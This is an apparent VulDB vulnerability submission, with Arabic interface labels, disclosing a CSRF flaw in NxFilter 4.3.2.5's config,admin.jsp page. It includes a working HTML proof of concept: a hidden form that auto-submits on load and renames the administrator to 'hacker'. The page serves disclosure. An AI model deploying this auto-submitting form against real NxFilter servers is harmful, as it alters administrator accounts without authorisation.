إرسال #249432: Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRFالمعلومات

عنوان	Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF
الوصف	A CSRF is present in https://APP.COM/config,admin.jsp where a malicious user change the username of the administrator through a CSRF. If the Admin clicks on the link, his name can be changed by the name the hacker want. Exploit in HTML: <!DOCTYPE html> <html lang="en"> <head> </head> <body> <form id="configForm" action="https://192.168.0.134/config,admin.jsp" method="POST"> <!-- Campos do formulário --> <input type="hidden" name="actionFlag" value="update"> <input type="text" name="admin_name" value="hacker" style="display: none;"> <!--name here--> <!-- Botão para enviar o formulário --> <button type="submit">Enviar Requisição</button> </form> </body> <script> document.getElementById('configForm').submit(); </script> </html>
المصدر	⚠️ https://APP.COM/config,admin.jsp
المستخدم	0xgordo (UID 50709)
ارسال	08/12/2023 05:26 PM (3 سنوات منذ)
الاعتدال	17/12/2023 09:25 AM (9 days later)
الحالة	تمت الموافقة
إدخال VulDB	248266 [Jahastech NxFilter 4.3.2.5 /config,admin.jsp admin_name تزوير طلبات عبر المواقع]
النقاط	17

Might our Artificial Intelligence support you?

Check our Alexa App!